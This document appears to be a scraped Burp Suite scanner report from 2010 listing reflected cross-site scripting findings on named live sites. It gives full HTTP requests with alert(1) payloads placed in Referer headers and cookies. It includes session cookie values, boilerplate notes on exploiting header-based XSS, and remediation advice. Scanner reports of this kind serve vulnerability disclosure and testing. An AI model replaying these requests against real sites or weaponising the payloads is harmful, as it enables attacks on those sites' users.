GET /offering/why_outsource.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=77850"><script>alert(1)</script>ddd21a01333
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=57BDEF128F01968B5160E0A0FB03BDE3; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:32 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf295'-alert(1)-'5843221fa96 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Referer: http://www.google.com/search?hl=en&q=bf295'-alert(1)-'5843221fa96
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17020'-alert(1)-'6ab24a70c03 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74e4d'-alert(1)-'3e89fe62ccb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /email-marketing/index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Referer: http://www.google.com/search?hl=en&q=74e4d'-alert(1)-'3e89fe62ccb
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95064'-alert(1)-'bd971dcce7f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /event-marketing/index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Referer: http://www.google.com/search?hl=en&q=95064'-alert(1)-'bd971dcce7f
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 894a1'-alert(1)-'4a5eb696dc0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.jsp?pn=mitconsulting HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Referer: http://www.google.com/search?hl=en&q=894a1'-alert(1)-'4a5eb696dc0
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b70a'-alert(1)-'161db29b4ad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=2b70a'-alert(1)-'161db29b4ad
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a144f'-alert(1)-'ccf758e4023 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /learning-center/glossary/social-media/index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Referer: http://www.google.com/search?hl=en&q=a144f'-alert(1)-'ccf758e4023
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12e78'-alert(1)-'140d9857aa2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /learning-center/hints-tips/em/social.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Referer: http://www.google.com/search?hl=en&q=12e78'-alert(1)-'140d9857aa2
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91d40'-alert(1)-'0fc2ab98b7e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /learning-center/hints-tips/ht-2010-05b.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Referer: http://www.google.com/search?hl=en&q=91d40'-alert(1)-'0fc2ab98b7e
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b860'-alert(1)-'363771d247c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /learning-center/index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Referer: http://www.google.com/search?hl=en&q=7b860'-alert(1)-'363771d247c
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb689'-alert(1)-'50bf1573b44 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /local/index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Referer: http://www.google.com/search?hl=en&q=fb689'-alert(1)-'50bf1573b44
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d816'-alert(1)-'987dc8ed247 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /media/pdf/get-started-building-your-social-media-presence.pdf HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Referer: http://www.google.com/search?hl=en&q=7d816'-alert(1)-'987dc8ed247
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d92b0'-alert(1)-'809b333c2b4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
